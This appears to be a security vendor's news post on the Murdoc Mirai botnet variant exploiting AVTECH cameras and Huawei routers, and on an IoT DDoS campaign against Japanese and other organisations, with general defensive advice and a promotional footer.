Cybersecurity researchers have reported a new threat involving a campaign that exploits vulnerabilities in AVTECH IP cameras and Huawei HG532 routers.
Cybersecurity researchers have reported a new threat involving a campaign that exploits vulnerabilities in AVTECH IP cameras and Huawei HG532 routers. This campaign incorporates these devices into a Mirai botnet variant known as the Murdoc Botnet.
In July 2024, the campaign infected over 1,370 devices, with most of the infections reported in Malaysia, Mexico, Thailand, Indonesia, and Vietnam. The botnet showcases advanced techniques to exploit security flaws and build extensive networks of compromised devices, highlighting the increasing scale and sophistication of such cyberattacks.
The botnet is exploiting vulnerabilities, specifically CVE-2024-7029, to compromise IoT devices. The attackers use these vulnerabilities to gain unauthorised access to devices and execute a shell script that downloads and runs the malware based on the device’s CPU architecture. The primary purpose of these attacks is to make botnet capable of denial-of-service(DDoS) attacks.
This activity leads to similar incidents, such as the gayfemboy Mirai botnet variant exploiting a security flaw in Four-Faith industrial routers in late 2024. The malicious actors were also previously found using CVE-2024-7029 to add AVTECH devices to a botnet, as revealed by Akamai in mid-2024, demonstrating a consistent pattern of exploiting IoT device vulnerabilities to build botnet networks for malicious purposes.
Since late 2024, a significant distributed denial-of-service (DDoS) attack campaign has targeted major Japanese corporations and banks. This campaign utilises an Internet of Things (IoT) botnet formed by exploiting device vulnerabilities and weak credentials. The attacks have also extended to organisations in the U.S., Bahrain, Poland, Spain, Israel, and Russia. Sectors affected include telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services. As per the reports, over 55% of the compromised devices are in India, with significant numbers also in South Africa, Brazil, Bangladesh, and Kenya.
The botnet comprises malware variants derived from Mirai and BASHLITE, as reported by Trend Micro. The botnet issues commands that enable various DDoS attack methods, malware updates, and proxy services. The attack involves infiltrating IoT devices to deploy a loader malware, which then downloads the payload. This payload connects to a command-and-control(C2) server and awaits further instructions for DDoS attacks and other malicious activities. Monitoring for suspicious processes, events, and network traffic from executing untrusted binaries or scripts is advised. Additionally, updating and changing default usernames and passwords are recommended.
Want your digital assets to be protected?
CyberShelter provides innovative and modern cybersecurity products and niche services to individuals and organization against all kinds of cyber threats.
For the latest cyber threats and the latest hacking news please follow us on Facebook, Linkedin, and Twitter.